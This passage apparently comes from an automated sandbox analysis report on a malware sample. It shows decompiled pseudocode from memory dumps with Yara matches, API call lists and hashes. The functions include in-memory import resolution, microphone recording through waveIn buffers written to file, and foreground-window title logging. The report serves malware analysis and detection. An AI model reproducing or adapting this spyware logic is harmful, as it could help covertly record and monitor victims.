                    				char _t67;
                    				intOrPtr* _t68;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr _t75;
                    				void* _t76;
                    				void* _t77;
                    				signed int _t80;
                    				intOrPtr _t82;
                    				void* _t86;
                    				signed int _t87;
                    				void* _t89;
                    				signed int _t91;
                    				intOrPtr* _t98;
                    				void* _t101;
                    				intOrPtr _t102;
                    				intOrPtr _t103;
                    
                    				_t101 = _a4;
                    				if(_t101 != 0) {
                    					_t80 = 9;
                    					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                    					_t98 = _a8;
                    					__eflags = _t98;
                    					if(_t98 != 0) {
                    						_t82 =  *((intOrPtr*)(_t98 + 4));
                    						_t47 =  *_t98;
                    						_v16 = _t47;
                    						_v12 = _t82;
                    						__eflags = _t82 - 0xffffffff;
                    						if(__eflags > 0) {
                    							L7:
                    							_t89 = 7;
                    							__eflags = _t82 - _t89;
                    							if(__eflags < 0) {
                    								L12:
                    								_v5 = 0;
                    								_t50 = E105CD43C(_t82, __eflags,  &_v16,  &_v5);
                    								_t75 = _v16;
                    								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                    								_t52 = E105E1A2E(_t75, _v12, 0x15180, 0);
                    								 *(_t101 + 0x1c) = _t52;
                    								_t86 = 0x4591d8;
                    								_t76 = _t75 - _t52 * 0x15180;
                    								asm("sbb eax, edx");
                    								__eflags = _v5;
                    								if(_v5 == 0) {
                    									_t86 = 0x4591a4;
                    								}
                    								_t91 =  *(_t101 + 0x1c);
                    								_t56 = 1;
                    								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                    								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                    									L16:
                    									_t57 = _t56 - 1;
                    									 *(_t101 + 0x10) = _t57;
                    									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                    									_t59 = E105E1A2E( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                    									_t87 = 7;
                    									asm("cdq");
                    									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                    									_t63 = E105E1A2E(_t76, _v12, 0xe10, 0);
                    									 *(_t101 + 8) = _t63;
                    									_t77 = _t76 - _t63 * 0xe10;
                    									asm("sbb edi, edx");
                    									_t65 = E105E1A2E(_t77, _v12, 0x3c, 0);
                    									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                    									 *(_t101 + 4) = _t65;
                    									_t67 = 0;
                    									__eflags = 0;
                    									 *_t101 = _t77 - _t65 * 0x3c;
                    									L17:
                    									return _t67;
                    								} else {
                    									do {
                    										_t56 = _t56 + 1;
                    										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                    									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                    									goto L16;
                    								}
                    							}
                    							if(__eflags > 0) {
                    								L10:
                    								_t68 = E105CB372();
                    								_t102 = 0x16;
                    								 *_t68 = _t102;
                    								L11:
                    								_t67 = _t102;
                    								goto L17;
                    							}
                    							__eflags = _t47 - 0x934126cf;
                    							if(__eflags <= 0) {
                    								goto L12;
                    							}
                    							goto L10;
                    						}
                    						if(__eflags < 0) {
                    							goto L10;
                    						}
                    						__eflags = _t47 - 0xffff5740;
                    						if(_t47 < 0xffff5740) {
                    							goto L10;
                    						}
                    						goto L7;
                    					}
                    					_t69 = E105CB372();
                    					_t102 = 0x16;
                    					 *_t69 = _t102;
                    					E105C77CB();
                    					goto L11;
                    				}
                    				_t71 = E105CB372();
                    				_t103 = 0x16;
                    				 *_t71 = _t103;
                    				E105C77CB();
                    				return _t103;
                    			}

                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9609b60ad482849be7f0775b9ae825adec5be7e62851433c6d5ae4a03e3831c7
                    • Instruction ID: db2a9bad3655658139c137ff4aaa6ce494f570161723c8a2404211f12ad9fdcd
                    • Opcode Fuzzy Hash: 9609b60ad482849be7f0775b9ae825adec5be7e62851433c6d5ae4a03e3831c7
                    • Instruction Fuzzy Hash: 5F41EA75A00784EFD714AFB8CE45B9ABFFDEBC8B10F10892AF541DB280D671A9418791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
                    • Instruction ID: 733164f05b9f7aeaec00074263a2a0c70db5c9dd2c0fe6a7367e2e5b9d18385d
                    • Opcode Fuzzy Hash: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
                    • Instruction Fuzzy Hash: 20412972600714BFD7249F78CC81B6ABBE8EB8C714F10952FF111EB281D779A9018B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E10595B19(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
                    				signed int _v12;
                    				signed int _v16;
                    				void* _v20;
                    				char _v44;
                    				char _v68;
                    				void* __ebx;
                    				void* __esi;
                    				void* _t41;
                    				signed int _t46;
                    				void* _t70;
                    				void* _t73;
                    				void* _t74;
                    				struct _SECURITY_ATTRIBUTES* _t77;
                    				void* _t101;
                    				intOrPtr _t103;
                    				void* _t105;
                    				void* _t106;
                    				void* _t107;
                    
                    				_t101 = __edx;
                    				_v12 = _v12 & 0x00000000;
                    				_t105 = __ecx;
                    				_v20 = __ecx;
                    				 *(__ecx + 0x48) =  *(__ecx + 0x48) & 0x00000000;
                    				E10592F43(_t74,  &_v44);
                    				_t103 = _a4;
                    				_t8 = _t105 + 0x4c; // 0x46c184
                    				_t41 = _t8;
                    				while(E10595CBF(_t105, E10592E03(_t103),  &_v12, _t41) != 0) {
                    					_t10 = _t105 + 0x40; // 0x8
                    					_t46 =  *_t10 & 0x000000ff;
                    					_v16 = _t46;
                    					if(_v12 + _t46 <= E105932F7()) {
                    						_t77 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t77 = 1;
                    						_t73 = E105932F7();
                    						_t105 = _v20;
                    						_t103 = _a4;
                    						 *((intOrPtr*)(_t105 + 0x48)) = _v16 + _v12 - _t73;
                    					}
                    					if(_t77 == 0) {
                    						_t78 = _v16;
                    						E10592E3F( &_v44, _t101, _t105, E10595114(_t103,  &_v68, _v16, 0xffffffff));
                    						E10592E35();
                    						E10592E3F( &_v44, _t101, _t105, E10595114( &_v44,  &_v68, 0, _v12));
                    						E10592E35();
                    						_t112 = _a12;
                    						if(_a12 != 0) {
                    							_t30 = _t105 + 0x1c; // 0x46c154
                    							E10592E1B(_t30,  &_v44);
                    							 *(_t105 + 0x34) = CreateEventA(0, 0, 0, 0);
                    							__eflags = 0;
                    							CreateThread(0, 0, _a8, _t105, 0, 0);
                    							_t33 = _t105 + 0x34; // 0x0
                    							WaitForSingleObject( *_t33, 0xffffffff);
                    							_t34 = _t105 + 0x34; // 0x0
                    							CloseHandle( *_t34);
                    						} else {
                    							_t107 = _t106 - 0x18;
                    							E10592F5A(_t78, _t107, _t101, _t112,  &_v44);
                    							_a8(_t105);
                    							_t106 = _t107 + 0x1c;
                    						}
                    						E10592E3F(_t103, _t101, _t105, E10595114(_t103,  &_v68, _v12 + _t78, 0xffffffff));
                    						E10592E35();
                    						_t70 = E105932F7();
                    						_t38 = _t105 + 0x4c; // 0x46c184
                    						_t41 = _t38;
                    						if(_t70 != 0) {
                    							continue;
                    						}
                    					}
                    					break;
                    				}
                    				return E10592E35();
                    			}

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C184), ref: 10595C06
                    • CreateThread.KERNEL32(00000000,00000000,?,0046C138,00000000,00000000), ref: 10595C19
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,10595AB2,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10595C24
                    • CloseHandle.KERNEL32(00000000,?,?,10595AB2,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10595C2D
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3360349984-0
                    • Opcode ID: 5b6b611b49e1213bd87562da551e4e1ce449607d8c631bfeaacc394aa3a9b5aa
                    • Instruction ID: efdc30acb778c609c9e1d328c5d43ede3213e10a4d0cb1eee818fbbaca4732c2
                    • Opcode Fuzzy Hash: 5b6b611b49e1213bd87562da551e4e1ce449607d8c631bfeaacc394aa3a9b5aa
                    • Instruction Fuzzy Hash: D1416F75900219AFCF04DBA4CC99DFEBFBDEF88265F040559F552A3291DA30AA15CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 55%
                    			E105A036C(intOrPtr* __ecx) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				intOrPtr* _v16;
                    				signed short* _v20;
                    				intOrPtr _t41;
                    				intOrPtr _t44;
                    				intOrPtr _t46;
                    				signed short _t57;
                    				signed int _t58;
                    				intOrPtr _t59;
                    				intOrPtr* _t60;
                    				void* _t64;
                    				void* _t66;
                    				intOrPtr _t68;
                    				intOrPtr _t76;
                    				intOrPtr* _t79;
                    				intOrPtr _t80;
                    				void _t81;
                    				signed short* _t82;
                    				void* _t87;
                    				intOrPtr* _t88;
                    				void* _t89;
                    
                    				_t88 = __ecx;
                    				_t87 = 1;
                    				_t41 =  *__ecx;
                    				_t68 =  *((intOrPtr*)(__ecx + 4));
                    				_v12 = _t68;
                    				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
                    					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
                    					if(IsBadHugeReadPtr(_t64, 0x14) == 0) {
                    						_t66 = _t64 + 0x10;
                    						while(1) {
                    							_t44 =  *((intOrPtr*)(_t66 - 4));
                    							if(_t44 == 0) {
                    								goto L23;
                    							}
                    							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
                    							_v8 = _t46;
                    							if(_t46 == 0) {
                    								_push(0x7e);
                    								goto L22;
                    							} else {
                    								_push(4 +  *(_t88 + 0xc) * 4);
                    								_push( *((intOrPtr*)(_t88 + 8)));
                    								_t80 = E105CBCA2();
                    								if(_t80 == 0) {
                    									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
                    									_push(0xe);
                    									L22:
                    									SetLastError();
                    									_t87 = 0;
                    								} else {
                    									 *((intOrPtr*)(_t88 + 8)) = _t80;
                    									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
                    									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
                    									_t81 =  *(_t66 - 0x10);
                    									if(_t81 == 0) {
                    										_t81 =  *_t66;
                    									}
                    									_t82 = _t81 + _v12;
                    									_t76 = _v8;
                    									_v16 =  *_t66 + _v12;
                    									_v20 = _t82;
                    									if( *_t82 != 0) {
                    										while(1) {
                    											_t57 =  *_t82;
                    											_push( *((intOrPtr*)(_t88 + 0x34)));
                    											if(_t57 >= 0) {
                    												_t58 = _t57 + _v12 + 2;
                    											} else {
                    												_t58 = _t57 & 0x0000ffff;
                    											}
                    											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
                    											_t79 = _v16;
                    											_t89 = _t89 + 0xc;
                    											 *_t79 = _t59;
                    											_t60 = _t79;
                    											_t76 = _v8;
                    											if( *_t60 == 0) {
                    												break;
                    											}
                    											_t82 =  &(_v20[2]);
                    											_v16 = _t60 + 4;
                    											_v20 = _t82;
                    											if( *_t82 != 0) {
                    												continue;
                    											} else {
                    											}
                    											goto L16;
                    										}
                    										_t87 = 0;
                    									}
                    									L16:
                    									if(_t87 == 0) {
                    										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
                    										SetLastError(0x7f);
                    									} else {
                    										_t66 = _t66 + 0x14;
                    										if(IsBadHugeReadPtr(_t66 - 0x10, 0x14) == 0) {
                    											continue;
                    										} else {
                    										}
                    									}
                    								}
                    							}
                    							goto L23;
                    						}
                    					}
                    					L23:
                    				}
                    				return _t87;
                    			}

                    APIs
                    • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 105A039A
                    • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 105A046C
                    • SetLastError.KERNEL32(0000007F), ref: 105A0487
                    • SetLastError.KERNEL32(0000007E,?,105A0709), ref: 105A04A0
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ErrorHugeLastRead
                    • String ID:
                    • API String ID: 3239643929-0
                    • Opcode ID: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
                    • Instruction ID: afb7c9ec13f5bb31c80a3a75ba48dd84463a52a9f04e38b6b3ad7a76891aeb8e
                    • Opcode Fuzzy Hash: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
                    • Instruction Fuzzy Hash: 51418771A10205EFEB10CF59D884B6EBBF5FF88711F109869E68697281EB71E900DB20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E105DA21A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* _v40;
                    				signed int _t40;
                    				int _t46;
                    				int _t53;
                    				void* _t55;
                    				int _t57;
                    				signed int _t63;
                    				int _t67;
                    				short* _t69;
                    				signed int _t70;
                    				short* _t71;
                    
                    				_v8 =  *0x46a00c ^ _t70;
                    				E105C6375(__ebx,  &_v28, __edx, _a4);
                    				_t57 = _a24;
                    				if(_t57 == 0) {
                    					_t53 =  *(_v24 + 8);
                    					_t57 = _t53;
                    					_a24 = _t53;
                    				}
                    				_t67 = 0;
                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                    				_v12 = _t40;
                    				if(_t40 == 0) {
                    					L15:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return E105C0B89(_v8 ^ _t70);
                    				}
                    				_t55 = _t40 + _t40;
                    				_t17 = _t55 + 8; // 0x43
                    				asm("sbb eax, eax");
                    				if((_t17 & _t40) == 0) {
                    					_t69 = 0;
                    					L11:
                    					if(_t69 != 0) {
                    						E105C2D6E(_t67, _t69, _t67, _t55);
                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                    						if(_t46 != 0) {
                    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                    						}
                    					}
                    					L14:
                    					E105C1A0E(_t69);
                    					goto L15;
                    				}
                    				_t20 = _t55 + 8; // 0x43
                    				asm("sbb eax, eax");
                    				_t48 = _t40 & _t20;
                    				_t21 = _t55 + 8; // 0x43
                    				_t63 = _t21;
                    				if((_t40 & _t20) > 0x400) {
                    					asm("sbb eax, eax");
                    					_t69 = E105D07FA(_t63, _t48 & _t63);
                    					if(_t69 == 0) {
                    						goto L14;
                    					}
                    					 *_t69 = 0xdddd;
                    					L9:
                    					_t69 =  &(_t69[4]);
                    					goto L11;
                    				}
                    				asm("sbb eax, eax");
                    				E105E167E();
                    				_t69 = _t71;
                    				if(_t69 == 0) {
                    					goto L14;
                    				}
                    				 *_t69 = 0xcccc;
                    				goto L9;
                    			}

                    APIs
                    • MultiByteToWideChar.KERNEL32(0000003B,00000000,00000006,?,00000000,00000000,?,?,?,0000003B,00000001,?,00000006,00000001,?,?), ref: 105DA267
                    • MultiByteToWideChar.KERNEL32(0000003B,00000001,00000006,?,00000000,?,?,?,0000003B,00000001,?,00000006,00000001,?,?,0000003B), ref: 105DA2F0
                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,0000003B,00000001,?,00000006,00000001,?,?,0000003B,00000002,?), ref: 105DA302
                    • __freea.LIBCMT ref: 105DA30B
                      • Part of subcall function 105D07FA: RtlAllocateHeap.NTDLL(00000000,?), ref: 105D082C
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                    • String ID:
                    • API String ID: 2652629310-0
                    • Opcode ID: 2547f79aa2ce97ebef8943f529e29c31ea25f9519c78378d0bb7a28436d94ffe
                    • Instruction ID: 1d39251c41dcb0a3821b7edfbb751f777dc497b128412269edbce91f6c4da5bd
                    • Opcode Fuzzy Hash: 2547f79aa2ce97ebef8943f529e29c31ea25f9519c78378d0bb7a28436d94ffe
                    • Instruction Fuzzy Hash: B631DE32A0020AABDF158FA9DC45EAF7FA5EB40750F01452AFC05D7290EB35DD91CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E10592B5D(void* __ebx, void* __edi, intOrPtr _a8) {
                    				char _v84;
                    				char _v112;
                    				void* _v116;
                    				char _v136;
                    				void* _v140;
                    				char _v160;
                    				void* _v164;
                    				char _v184;
                    				void* _v188;
                    				char _v204;
                    				char _v208;
                    				void* _v212;
                    				char _v228;
                    				char _v232;
                    				char _v236;
                    				void* __esi;
                    				void* _t29;
                    				void* _t75;
                    
                    				_t47 = __ebx;
                    				_push(_t75);
                    				E10592DDB(__ebx,  &_v228);
                    				_t82 = _a8 - 0x3c0;
                    				if(_a8 == 0x3c0) {
                    					E1059255E();
                    					E105C6527( &_v84, 0x50, 0x45f3f0, E10592556());
                    					E10592EF2(__ebx,  &_v204,  &_v84);
                    					_t29 = E105A8148( &_v112,  &_v208);
                    					E10592D68( &_v232, _t31, _t75, E10593F14(_t47,  &_v184, E10593E9E( &_v160, E10593E68(__ebx,  &_v136, 0x46c0e0, 0x5c), _t29), __edi, _t82, 0x45f400));
                    					E10592D5E();
                    					E10592D5E();
                    					E10592D5E();
                    					E10592D5E();
                    					E10592E35();
                    					E105928D2(E10592D59( &_v236), 0x46ba78);
                    					waveInUnprepareHeader( *0x46bab0, 0x46ba78, 0x20);
                    					0x46ba78->lpData = E10592E03(0x46c0f8);
                    					 *0x46ba7c =  *0x46bab4;
                    					 *0x46ba80 = 0;
                    					 *0x46ba84 = 0;
                    					 *0x46ba88 = 0;
                    					 *0x46ba8c = 0;
                    					waveInPrepareHeader( *0x46bab0, 0x46ba78, 0x20);
                    					waveInAddBuffer( *0x46bab0, 0x46ba78, 0x20);
                    				}
                    				return E10592D5E();
                    			}

                    APIs
                    • _strftime.LIBCMT ref: 10592BA2
                      • Part of subcall function 105928D2: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1059293A
                    • waveInUnprepareHeader.WINMM(0046BA78,00000020,00000000,?), ref: 10592C54
                    • waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 10592C92
                    • waveInAddBuffer.WINMM(0046BA78,00000020), ref: 10592CA1
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                    • String ID:
                    • API String ID: 3809562944-0
                    • Opcode ID: 87685d2b9442a98e480f628d0fe5e7b34b9df1dae7f4d06bc68124184a98d097
                    • Instruction ID: 2b20bba77fe0b32e24003aea87691042d7bb680f8e6830ecd17c0134729d56d4
                    • Opcode Fuzzy Hash: 87685d2b9442a98e480f628d0fe5e7b34b9df1dae7f4d06bc68124184a98d097
                    • Instruction Fuzzy Hash: 7C318E355043449BC314EF64EC5AEAF7FA8EB94340F40843DF595961A0FF70AA4ACB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00417ABF: GetForegroundWindow.USER32(73B76490,?), ref: 00417ACF
                      • Part of subcall function 00417ABF: GetWindowTextLengthW.USER32(00000000), ref: 00417AD8
                      • Part of subcall function 00417ABF: GetWindowTextW.USER32 ref: 00417B02
                    • Sleep.KERNEL32(000001F4), ref: 00408AAF
                    • Sleep.KERNEL32(00000064), ref: 00408B49
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$ForegroundLength
                    • String ID: [ $ ]
                    • API String ID: 3309952895-93608704
                    • Opcode ID: 61ffcbbbe14b13f04157bb48f78c33ab662183f2310c94efc5ab64b36d35b440
                    • Instruction ID: 8573281f0cdc3ffc3b69c5d15ae9f7dd0d08734189249b75f226d29c1755f02c
                    • Opcode Fuzzy Hash: 61ffcbbbe14b13f04157bb48f78c33ab662183f2310c94efc5ab64b36d35b440
                    • Instruction Fuzzy Hash: EE21B0B160420067C604B676DD1396F72699F90348F40043FF982772E3EE3DAA09869F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db438a00ac30559f4f193afadc31410c96385359a40aac0a007d396ff2af39bb
                    • Instruction ID: e4b0062e58d0d7237c716dd182029255e048b2798701f0240ba592bb915f7d8f
                    • Opcode Fuzzy Hash: db438a00ac30559f4f193afadc31410c96385359a40aac0a007d396ff2af39bb
                    • Instruction Fuzzy Hash: 5101F2B2A097063EF6212A783CC1F27220CDF453B8F341B6BF521622D5DE78CC014168
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 35b35c0bef6846c723b1eec02a1325ea3f2ea48b9f05e2900ff3fad41c018c60
                    • Instruction ID: af3406132430cef04dbb00c021b8739ed0fb4e326e8fb5295b0caa8951ed8692
                    • Opcode Fuzzy Hash: 35b35c0bef6846c723b1eec02a1325ea3f2ea48b9f05e2900ff3fad41c018c60
                    • Instruction Fuzzy Hash: 6D0167B29096167AA71125797CC1D6B631CEF553B9B20132BB921512D1DA78CC114169
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E10599A2E(void* __ecx, void* __edx) {
                    				void* __ebx;
                    				int _t9;
                    				long _t14;
                    				void* _t22;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    				void* _t30;
                    
                    				_t22 = __edx;
                    				_t9 =  *0x46c3f8 |  *0x46c3fc;
                    				_t24 = __ecx;
                    				if(_t9 != 0) {
                    					 *((char*)(__ecx + 0x39)) = 0;
                    					do {
                    						_t9 = CreateFileW(E10592D59(0x46c3b0), 0x80000000, 7, 0, 3, 0x80, 0);
                    						_t23 = _t9;
                    						if(_t23 == 0xffffffff) {
                    							 *((char*)(_t24 + 0x39)) = 0;
                    						} else {
                    							_t14 = GetFileSize(_t23, 0);
                    							_t30 = 0 -  *0x46c3fc;
                    							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46c3f8)) {
                    								 *((char*)(_t24 + 0x39)) = 1;
                    								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
                    									E1059A417(0, _t24);
                    								}
                    								Sleep(0x2710);
                    							}
                    							_t9 = CloseHandle(_t23);
                    						}
                    					} while ( *((char*)(_t24 + 0x39)) == 1);
                    					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
                    						_t35 =  *0x46a9d4 - 0x31;
                    						if( *0x46a9d4 == 0x31) {
                    							E105981BE(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
                    							return E105995B0(_t24);
                    						}
                    					}
                    				}
                    				return _t9;
                    			}

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,10599B05), ref: 10599A64
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,10599B05), ref: 10599A73
                    • Sleep.KERNEL32(00002710,?,?,?,10599B05), ref: 10599AA0
                    • CloseHandle.KERNEL32(00000000,?,?,?,10599B05), ref: 10599AA7
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSizeSleep
                    • String ID:
                    • API String ID: 1958988193-0
                    • Opcode ID: 71eb9f2a0935b1f007b4f6b80da6e27fbbd2f56b936bf55f49f24ed5d95080b1
                    • Instruction ID: 06c456c37fb42e9fa26f4319d07626dcdfaec8fe9aa64a0fad8310973fa9b5cd
                    • Opcode Fuzzy Hash: 71eb9f2a0935b1f007b4f6b80da6e27fbbd2f56b936bf55f49f24ed5d95080b1
                    • Instruction Fuzzy Hash: B21184302017426FD7115B789CC9A2E3FBFEBC5281F04885DF5C147655D6A4EC948357
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408C97), ref: 00408BF6
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408C97), ref: 00408C05
                    • Sleep.KERNEL32(00002710,?,?,?,00408C97), ref: 00408C32
                    • CloseHandle.KERNEL32(00000000,?,?,?,00408C97), ref: 00408C39
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSizeSleep
                    • String ID:
                    • API String ID: 1958988193-0
                    • Opcode ID: fd32d5470f6a82b64451d4a6fc001d2afe9d9ea922123fe35fcf77b3356e9bff
                    • Instruction ID: f48aa324faeb3bf29cf9054a7041348a4769ce812d4e844a5eb2815f39313da9
                    • Opcode Fuzzy Hash: fd32d5470f6a82b64451d4a6fc001d2afe9d9ea922123fe35fcf77b3356e9bff
                    • Instruction Fuzzy Hash: F9112B702067406FFA35AB349EC962F7AA99741741F04487FF6C2726D2CA79D894833E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E105A884A(WCHAR* __ecx, intOrPtr __edx) {
                    				intOrPtr _v8;
                    				long _v12;
                    				void* __ebx;
                    				void* __edi;
                    				struct _OVERLAPPED* _t13;
                    				struct _OVERLAPPED* _t15;
                    				void* _t22;
                    				long _t25;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t15 = 0;
                    				_v8 = __edx;
                    				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
                    				if(_t22 != 0xffffffff) {
                    					_t25 = GetFileSize(_t22, 0);
                    					E105932C7(0, _v8, _t22, _t25, 0);
                    					_v12 = 0;
                    					if(ReadFile(_t22, E10592E03(_v8), _t25,  &_v12, 0) != 0) {
                    						_t15 = 1;
                    					}
                    					CloseHandle(_t22);
                    					_t13 = _t15;
                    				} else {
                    					_t13 = 0;
                    				}
                    				return _t13;
                    			}

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,1059509E,0045F464), ref: 105A8867
                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,1059509E,0045F464), ref: 105A887B
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,1059509E,0045F464), ref: 105A88A0
                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,1059509E,0045F464), ref: 105A88AE
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleReadSize
                    • String ID:
                    • API String ID: 3919263394-0
                    • Opcode ID: 21a53a381177d8aada825ebcf4af9ebb9d3ac045571280622984ad868f42abc5
                    • Instruction ID: 649c8eb9965619f7dfd6adbb29cda996b573986d84320201e2c814b08aa72214
                    • Opcode Fuzzy Hash: 21a53a381177d8aada825ebcf4af9ebb9d3ac045571280622984ad868f42abc5
                    • Instruction Fuzzy Hash: 2701D174501219BFE7109F60ACC9EBFBB6CDB862A6F1005A9FC00A3281CA349F019670
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E105D2EA1(signed int _a4) {
                    				signed int _t9;
                    				void* _t13;
                    				signed int _t15;
                    				WCHAR* _t22;
